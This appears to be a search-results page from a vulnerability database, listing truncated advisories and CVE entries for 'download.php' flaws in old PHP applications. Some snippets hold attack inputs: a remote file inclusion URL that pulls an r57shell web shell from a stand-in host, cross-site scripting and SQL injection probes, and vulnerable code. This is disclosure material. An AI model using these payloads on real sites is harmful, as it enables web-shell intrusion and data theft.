422 matches found
com_forum Mambo Component <= 1.2.4RC3 Remote Include Vulnerability
No description provided by source. Bug Found by h4ntu http://h4ntu.com batamhacker crew Another Mambo component remote inclusion vulneribility download : http://mamboxchange.com/frs/download.php/6873/phpbbcomponent1.2.4RC3.zip bug found in file : download.php define'INPHPBB', true; //$phpbbrootpa...
com_forum Mambo Component <= 1.2.4RC3 Remote Include Vulnerability
Exploit for unknown platform in category web applications ================================================================== comforum Mambo Component = 1.2.4RC3 Remote Include Vulnerability ================================================================== Bug Found by h4ntu http://h4ntu.com...
Mambo Component com_forum 1.2.4RC3 - Remote File Inclusion
Bug Found by h4ntu http://h4ntu.com batamhacker crew Another Mambo component remote inclusion vulneribility download : http://mamboxchange.com/frs/download.php/6873/phpbbcomponent1.2.4RC3.zip bug found in file : download.php define'INPHPBB', true; //$phpbbrootpath = './'; include$phpbbrootpath...
Multiple file include exploits in Xtreme Downloads v.1.0
Multiple file include exploits in Xtreme Downloads v.1.0 script type : Xtreme Downloads v.1.0 bug found by : sweet-devil & black-code team : site-down type : file include exploits : download.php http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt? manager.php...
arabportalXSS.txt
ArabPortal 2.0 Stable .. The Best Arbian Portal & Forums System The Bug Is XSS code online.php?&title=D3vil-0x1CODE download.php?action=byuser&userid=1&title=D3vil-0x1CODE /code center ^^ Secumod 0.1 Anti-XSS & SQL Injection ^^ Get It For Free !! Only 15$ And Update it forever Connect Me By E-Mai...
Cross site scripting
Multiple cross-site scripting XSS vulnerabilities in Arab Portal 2.0 aka Arab Dynamic Portal or ADP stable allow remote attackers to inject arbitrary web script or HTML via the title parameter in 1 online.php and 2 download.php...
CVE-2006-1504
CVE-2006-1504 concerns multiple XSS vulnerabilities in Arab Portal 2.0 (also called Arab Dynamic Portal/ADP). The issues allow remote attackers to inject arbitrary web script or HTML by manipulating the title parameter in two pages: online.php and download.php. The affected software is Arab Porta...
ArabPortal 2.0 Stable CrossSiteScripting
ArabPortal 2.0 Stable .. The Best Arbian Portal & Forums System The Bug Is XSS code online.php?&title=D3vil-0x1/titleXSSCODE/XSS download.php?action=byuser&userid=1&title=D3vil-0x1/titleXSSCODE/XSS /code center ^^ Secumod 0.1 Anti-XSS & SQL Injection ^^ Get It For Free !! Only 15$ And Update it...
SQL-injection and XSS in photokorn gallery
Advisory: SQL-injection and XSS in photokorn gallery Home Page: http://www.telekorn.com Уязвимость/Vulnerability: SQL-injection Уязвимый скрипт/Vulnerable script: search.php http://www.stockvault.net/gallery/search.php?action=search&type=detail&where=keywords'&keyword=dotted Раскрытие установочно...
Bedeng PSP 1.1 - 'download.php?a.ngroup' SQL Injection
source: https://www.securityfocus.com/bid/15583/info Bedeng PSP is prone to SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise of the...
CVE-2005-3676
SQL injection vulnerability in download.php in PhpWebThings 1.4.4 allows remote attackers to execute arbitrary SQL commands via the file parameter...
CVE-2005-3676
The CVE-2005-3676 entry affects PhpWebThings 1.4.4, where a vulnerability in download.php allows SQL injection via the file parameter. This enables remote attackers to execute arbitrary SQL commands, with not-fully-specified impact details beyond the NVD summary. The connected documents confirm t...
CVE-2005-3676
SQL injection vulnerability in download.php in PhpWebThings 1.4.4 allows remote attackers to execute arbitrary SQL commands via the file parameter...
phpWebThings144-2.txt
Vulnerable: phpWebThings 1.4.4 website : http://phpwebthings.org The bug in download.php ThE Exploit : http://www.target.com/download.php?file=|SQL ThE Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'ord...
SQL injection in phpWebThing 1.4.4
Vulnerable: phpWebThings 1.4.4 website : http://phpwebthings.org The bug in download.php ThE Exploit : http://www.target.com/download.php?file=|SQL ThE Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'ord...
phpWebThings download.php file Parameter SQL Injection
Binary data 3290.prm...
Sql injection in jPortal version 2.3.1 (module download)
Versions: all from 2.2.1 to 2.3.1+Service Pack+shop jportalI check this bug only on one site SQL injection attack if magicquotesqpc=Off Problem is in file serching engine download.php, witch code is in “module/down.inc.php” file: code if$cat=='all' $q = "AND title LIKE '$word'"; else $q = "AND...
jPortalSQL.txt
Versions: all from 2.2.1 to 2.3.1+Service Pack+shop jportalI check this bug only on one site SQL injection attack if magicquotesqpc=Off Problem is in file serching engine download.php, witch code is in module/down.inc.php file: if$cat=='all' $q = "AND title LIKE '%$word%'"; else $q = "AND...
jPORTAL 2.2.1/2.3.1 - 'download.php' SQL Injection
source: https://www.securityfocus.com/bid/14926/info JPortal is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise of the...
CVE-2005-2607
PHP file include vulnerability in download.php in PHPSimplicity Simplicity oF Upload before 1.3.1 allows remote attackers to include arbitrary local and remote files via the language parameter and a terminating null "%00" characters...